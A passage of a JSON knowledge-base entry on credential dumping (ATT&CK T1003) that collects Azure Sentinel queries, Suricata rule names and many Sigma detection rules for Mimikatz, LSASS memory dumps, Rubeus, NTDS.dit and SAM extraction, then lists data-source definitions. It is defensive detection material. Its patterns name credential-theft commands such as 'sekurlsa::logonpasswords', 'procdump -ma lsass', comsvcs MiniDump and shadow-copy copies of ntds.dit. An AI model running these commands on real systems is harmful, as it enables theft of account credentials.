\"C:\\\\Windows\\\\system32\\\\KERNELBASE.dll\"and process_call_trace contains \"|UNKNOWN(*)\"", + "name": "Credential Dumping Process Access" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14) and process_path !contains \"C:\\\\WINDOWS\\\\system32\\\\lsass.exe\"and (registry_key_path contains \"\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Authentication\\\\Credential Provider\\\\\"or registry_key_path contains \"\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\\"or registry_key_path contains 
\"\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\SecurityProviders\\\\\"or registry_key_path contains \"\\\\Control\\\\SecurityProviders\\\\WDigest\\\\\")and registry_key_path !contains \"\\\\Lsa\\\\RestrictRemoteSamEventThrottlingWindow\"", + "name": "Credential Dumping Registry" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_path contains \"reg.exe\"and (process_command_line contains \"*save*HKLM\\\\sam*\"or process_command_line contains \"*save*HKLM\\\\system*\")", + "name": "Credential Dumping Registry Save" + }, + { + "product": "Suricata (NSM)", + "query": "ET ATTACK\\_RESPONSE Windows 64bit procdump Dump File Exfiltration", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET ATTACK\\_RESPONSE Windows 32bit procdump Dump File Exfiltration", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET MALWARE Mimikatz x86 Executable Transfer Over SMB", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET MALWARE Mimikatz x64 Executable Transfer Over SMB", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET MALWARE Mimikatz x86 Mimidrv.sys File Transfer Over SMB", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET MALWARE Mimikatz x64 Mimidrv.sys File Transfer Over SMB", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET MALWARE Mimikatz x86 Executable Download Over HTTP", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET MALWARE Mimikatz x64 Executable Download Over HTTP", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET MALWARE Mimikatz x86 Mimidrv.sys Download Over HTTP", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET MALWARE Mimikatz x64 Mimidrv.sys Download Over HTTP", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": 
"ET EXPLOIT GsecDump executed", + "name": "ET Open Rule" + } + ], + "possible_detections": [ + { + "title": "Judgement Panda Exfil Activity", + "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "references": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/" + ], + "author": "Florian Roth", + "date": "2019/02/21", + "tags": [ + "attack.credential_access", + "attack.t1081", + "attack.t1003" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "Image": "*\\xcopy.exe", + "CommandLine": "* /S /E /C /Q /H \\\\*" + }, + "selection2": { + "Image": "*\\adexplorer.exe", + "CommandLine": "* -snapshot \"\" c:\\users\\\\*" + }, + "condition": "selection1 or selection2" + }, + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + { + "title": "Antivirus Password Dumper Detection", + "id": "78cc2dd2-7d20-4d32-93ff-057084c38b93", + "description": "Detects a highly relevant Antivirus alert that reports a password dumper", + "date": "2018/09/09", + "modified": "2019/10/04", + "author": "Florian Roth", + "references": [ + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "logsource": { + "product": "antivirus" + }, + "detection": { + "selection": { + "Signature": [ + "*DumpCreds*", + "*Mimikatz*", + "*PWCrack*", + "HTool/WCE", + "*PSWtool*", + "*PWDump*", + "*SecurityTool*", + "*PShlSpy*" + ] + }, + "condition": "selection" + }, + "fields": [ + "FileName", + "User" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + { + "title": "Detection of SafetyKatz", + "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "status": "experimental", + "description": "Detects possible SafetyKatz Behaviour", + "references": [ + 
"https://github.com/GhostPack/SafetyKatz" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "author": "Markus Neis", + "date": "2018/07/24", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 11, + "TargetFilename": "*\\Temp\\debug.bin" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "LSASS Memory Dump", + "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "status": "experimental", + "description": "Detects process LSASS memory dump using procdump or taskmgr based on the CallTrace pointing to dbghelp.dll or dbgcore.dll for win10", + "author": "Samir Bousseaden", + "references": [ + "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html" + ], + "tags": [ + "attack.t1003", + "attack.s0002", + "attack.credential_access" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 10, + "TargetImage": "C:\\windows\\system32\\lsass.exe", + "GrantedAccess": "0x1fffff", + "CallTrace": [ + "*dbghelp.dll*", + "*dbgcore.dll*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "Mimikatz Detection LSASS Access", + "id": "0d894093-71bc-43c3-8c4d-ecfc28dcf5d9", + "status": "experimental", + "description": "Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION \"only old versions\", 0x0010 PROCESS_VM_READ)", + "references": [ + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html" + ], + "tags": [ + "attack.t1003", + "attack.s0002", + "attack.credential_access", + "car.2019-04-004" + ], + "logsource": { + "product": "windows", + "service": 
"sysmon" + }, + "detection": { + "selection": { + "EventID": 10, + "TargetImage": "C:\\windows\\system32\\lsass.exe", + "GrantedAccess": [ + "0x1410", + "0x1010" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "Mimikatz In-Memory", + "id": "c0478ead-5336-46c2-bd5e-b4c84bc3a36e", + "status": "experimental", + "description": "Detects certain DLL loads when Mimikatz gets executed", + "references": [ + "https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/" + ], + "tags": [ + "attack.s0002", + "attack.t1003", + "attack.lateral_movement", + "attack.credential_access", + "car.2019-04-004" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selector": { + "EventID": 7, + "Image": "C:\\Windows\\System32\\rundll32.exe" + }, + "dllload1": { + "ImageLoaded": "*\\vaultcli.dll" + }, + "dllload2": { + "ImageLoaded": "*\\wlanapi.dll" + }, + "exclusion": { + "ImageLoaded": [ + "ntdsapi.dll", + "netapi32.dll", + "imm32.dll", + "samlib.dll", + "combase.dll", + "srvcli.dll", + "shcore.dll", + "ntasn1.dll", + "cryptdll.dll", + "logoncli.dll" + ] + }, + "timeframe": "30s", + "condition": "selector | near dllload1 and dllload2 and not exclusion" + }, + "falsepositives": [ + "unknown" + ], + "level": "medium" + }, + { + "title": "Password Dumper Remote Thread in LSASS", + "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. 
A single execution can lead to hundreds of events.", + "references": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm" + ], + "status": "stable", + "author": "Thomas Patzke", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 8, + "TargetImage": "C:\\Windows\\System32\\lsass.exe", + "StartModule": null + }, + "condition": "selection" + }, + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.s0005" + ], + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "QuarksPwDump Dump File", + "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", + "status": "experimental", + "description": "Detects a dump file written by QuarksPwDump password dumper", + "references": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm" + ], + "author": "Florian Roth", + "date": "2018/02/10", + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "level": "critical", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 11, + "TargetFilename": "*\\AppData\\Local\\Temp\\SAM-*.dmp*" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ] + }, + { + "title": "LSASS Access Detected via Attack Surface Reduction", + "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "description": "Detects Access to LSASS Process", + "status": "experimental", + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter" + ], + "author": "Markus Neis", + "date": "2018/08/26", + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "logsource": { + "product": "windows_defender", + "definition": "Requirements:Enabled Block credential stealing from the Windows local security authority subsystem (lsass.exe) from Attack Surface Reduction (GUID: 
9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2)" + }, + "detection": { + "selection": { + "EventID": 1121, + "Path": "*\\lsass.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" + ], + "level": "high" + }, + { + "title": "Mimikatz Use", + "id": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8", + "description": "This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)", + "author": "Florian Roth", + "date": "2017/01/10", + "modified": "2019/10/11", + "tags": [ + "attack.s0002", + "attack.t1003", + "attack.lateral_movement", + "attack.credential_access", + "car.2013-07-001", + "car.2019-04-004" + ], + "logsource": { + "product": "windows" + }, + "detection": { + "keywords": { + "Message": [ + "* mimikatz *", + "* mimilib *", + "* <3 eo.oe *", + "* eo.oe.kiwi *", + "* privilege::debug *", + "* sekurlsa::logonpasswords *", + "* lsadump::sam *", + "* mimidrv.sys *", + "* p::d *", + "* s::l *" + ] + }, + "condition": "keywords" + }, + "falsepositives": [ + "Naughty administrators", + "Penetration test" + ], + "level": "critical" + }, + { + "title": "Cmdkey Cached Credentials Recon", + "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "status": "experimental", + "description": "Detects usage of cmdkey to look for cached credentials", + "references": [ + "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation", + "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx" + ], + "author": "jmallette", + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\cmdkey.exe", + "CommandLine": "* /list *" + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine", + "User" + ], + "falsepositives": [ 
+ "Legitimate administrative tasks." + ], + "level": "low" + }, + { + "title": "Mimikatz DC Sync", + "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", + "description": "Detects Mimikatz DC sync security events", + "status": "experimental", + "date": "2018/06/03", + "modified": "2019/10/08", + "author": "Benjamin Delpy, Florian Roth", + "references": [ + "https://twitter.com/gentilkiwi/status/1003236624925413376", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2" + ], + "tags": [ + "attack.credential_access", + "attack.s0002", + "attack.t1003" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4662, + "Properties": [ + "*Replicating Directory Changes All*", + "*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*" + ] + }, + "filter1": { + "SubjectDomainName": "Window Manager" + }, + "filter2": { + "SubjectUserName": [ + "NT AUTHORITY*", + "*$" + ] + }, + "condition": "selection and not filter1 and not filter2" + }, + "falsepositives": [ + "Valid DC Sync that is not covered by the filters; please report" + ], + "level": "high" + }, + { + "title": "Rubeus Hack Tool", + "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "description": "Detects command line parameters used by Rubeus hack tool", + "author": "Florian Roth", + "references": [ + "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/" + ], + "date": "2018/12/19", + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.s0005" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "* asreproast *", + "* dump /service:krbtgt *", + "* kerberoast *", + "* createnetonly /program:*", + "* ptt /ticket:*", + "* /impersonateuser:*", + "* renew /ticket:*", + "* asktgt /user:*", + "* harvest /interval:*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "unlikely" + ], + "level": "critical" + }, + { + "title": "Possible Impacket 
SecretDump remote activity", + "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "author": "Samir Bousseaden", + "references": [ + "https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "logsource": { + "product": "windows", + "service": "security", + "description": "The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure" + }, + "detection": { + "selection": { + "EventID": 5145, + "ShareName": "\\\\*\\ADMIN$", + "RelativeTargetName": "SYSTEM32\\\\*.tmp" + }, + "condition": "selection" + }, + "falsepositives": [ + "pentesting" + ], + "level": "high" + }, + { + "action": "global", + "title": "Malicious Service Install", + "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "description": "This method detects well-known keywords of malicious services in the Windows System Eventlog", + "author": "Florian Roth", + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.s0005" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection1": { + "EventID": [ + 7045 + ] + }, + "keywords": { + "Message": [ + "*WCE SERVICE*", + "*WCESERVICE*", + "*DumpSvc*" + ] + }, + "quarkspwdump": { + "EventID": 16, + "HiveName": "*\\AppData\\Local\\Temp\\SAM*.dmp" + }, + "condition": "( selection1 and keywords ) or ( selection2 and keywords ) or quarkspwdump" + }, + "falsepositives": [ + "Unlikely" + ], + "level": "high" + }, + { + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection2": { + "EventID": 4697 + } + } + }, + { + "title": "WCE wceaux.dll Access", + "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "status": "experimental", + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "author": "Thomas 
Patzke", + "references": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.s0005" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": [ + 4656, + 4658, + 4660, + 4663 + ], + "ObjectName": "*\\wceaux.dll" + }, + "condition": "selection" + }, + "falsepositives": [ + "Penetration testing" + ], + "level": "critical" + }, + { + "title": "NotPetya Ransomware Activity", + "id": "79aeeb41-8156-4fac-a0cd-076495ab82a1", + "status": "experimental", + "description": "Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil", + "author": "Florian Roth, Tom Ueltschi", + "references": [ + "https://securelist.com/schroedingers-petya/78870/", + "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100" + ], + "tags": [ + "attack.execution", + "attack.credential_access", + "attack.defense_evasion", + "attack.t1085", + "attack.t1070", + "attack.t1003", + "car.2016-04-002" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "pipe_com": { + "CommandLine": "*\\AppData\\Local\\Temp\\\\* \\\\.\\pipe\\\\*" + }, + "rundll32_dash1": { + "Image": "*\\rundll32.exe", + "CommandLine": "*.dat,#1" + }, + "perfc_keyword": [ + "*\\perfc.dat*" + ], + "condition": "1 of them" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Admin activity" + ], + "level": "critical" + }, + { + "title": "Process dump via comsvcs DLL", + "id": "09e6d5c0-05b8-4ff8-9eeb-043046ec774c", + "status": "experimental", + "description": "Detects process memory dump via comsvcs.dll and rundll32", + "references": 
[ + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://twitter.com/SBousseaden/status/1167417096374050817" + ], + "author": "Modexp (idea)", + "date": "2019/09/02", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "rundll_image": { + "Image": "*\\rundll32.exe" + }, + "rundll_ofn": { + "OriginalFileName": "RUNDLL32.EXE" + }, + "selection": { + "CommandLine": [ + "*comsvcs*MiniDump*full*", + "*comsvcs*MiniDumpW*full*" + ] + }, + "condition": "(rundll_image or rundll_ofn) and selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "falsepositives": [ + "unknown" + ], + "level": "medium" + }, + { + "title": "Password Dumper Activity on LSASS", + "id": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", + "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", + "status": "experimental", + "references": [ + "https://twitter.com/jackcr/status/807385668833968128" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4656, + "ProcessName": "C:\\Windows\\System32\\lsass.exe", + "AccessMask": "0x705", + "ObjectType": "SAM_DOMAIN" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unkown" + ], + "level": "high" + }, + { + "title": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", + "id": "2afafd61-6aae-4df4-baed-139fa1f4c345", + "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", + "status": "experimental", + "references": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm" + ], + "author": "Thomas Patzke", + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "logsource": { + "category": 
"process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "*\\ntdsutil*" + }, + "condition": "selection" + }, + "falsepositives": [ + "NTDS maintenance" + ], + "level": "high" + }, + { + "title": "Suspicious Use of Procdump", + "id": "5afee48e-67dd-4e03-a783-f74259dcf998", + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", + "status": "experimental", + "references": [ + "Internal Research" + ], + "author": "Florian Roth", + "date": "2018/10/30", + "modified": "2019/10/14", + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003", + "car.2013-05-009" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "CommandLine": [ + "* -ma *" + ] + }, + "selection2": { + "CommandLine": [ + "* lsass*" + ] + }, + "selection3": { + "CommandLine": [ + "* -ma ls*" + ] + }, + "condition": "( selection1 and selection2 ) or selection3" + }, + "falsepositives": [ + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" + ], + "level": "medium" + }, + { + "title": "SAM Dump to AppData", + "id": "839dd1e8-eda8-4834-8145-01beeee33acd", + "status": "experimental", + "description": "Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers", + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "author": "Florian Roth", + "logsource": { + "product": "windows", + "service": "system", + "definition": "The source of this type of event is Kernel-General" + }, + "detection": { + "selection": { + "EventID": 16 + }, + "keywords": { + "Message": [ + "*\\AppData\\Local\\Temp\\SAM-*.dmp *" + ] + }, + "condition": "all of 
them" + }, + "falsepositives": [ + "Penetration testing" + ], + "level": "high" + }, + { + "title": "Suspicious SYSVOL Domain Group Policy Access", + "id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", + "status": "experimental", + "description": "Detects Access to Domain Group Policies stored in SYSVOL", + "references": [ + "https://adsecurity.org/?p=2288", + "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100" + ], + "author": "Markus Neis", + "date": "2018/04/09", + "modified": "2018/12/11", + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "*\\SYSVOL\\\\*\\policies\\\\*" + }, + "condition": "selection" + }, + "falsepositives": [ + "administrative activity" + ], + "level": "medium" + }, + { + "title": "Activity Related to NTDS.dit Domain Hash Retrieval", + "id": "b932b60f-fdda-4d53-8eda-a170c1d97bbd", + "status": "experimental", + "description": "Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely", + "author": "Florian Roth, Michael Haag", + "references": [ + "https://www.swordshield.com/2015/07/getting-hashes-from-ntds-dit-file/", + "https://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/", + "https://securingtomorrow.mcafee.com/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", + "https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "vssadmin.exe Delete 
Shadows", + "vssadmin create shadow /for=C:", + "copy \\\\?\\GLOBALROOT\\Device\\\\*\\windows\\ntds\\ntds.dit", + "copy \\\\?\\GLOBALROOT\\Device\\\\*\\config\\SAM", + "vssadmin delete shadows /for=C:", + "reg SAVE HKLM\\SYSTEM ", + "esentutl.exe /y /vss *\\ntds.dit*" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Administrative activity" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "200-500", + " 4100-4104", + "PowerShell logs" + ], + [ + "Other Event IDs" + ], + [ + "Memory Forensics" + ], + [ + "API monitoring" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "200-500", + " 4100-4104", + "PowerShell logs" + ], + [ + "Other Event IDs" + ], + [ + "Memory Forensics" + ], + [ + "API monitoring" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + 
"Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + 
"data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + 
"definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object access", + "description": "An active directory object was accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "ad object" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object access", + "description": "An active directory object was accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "ad object" + }, + { + "data_source": "network traffic", + "definition": "Network 
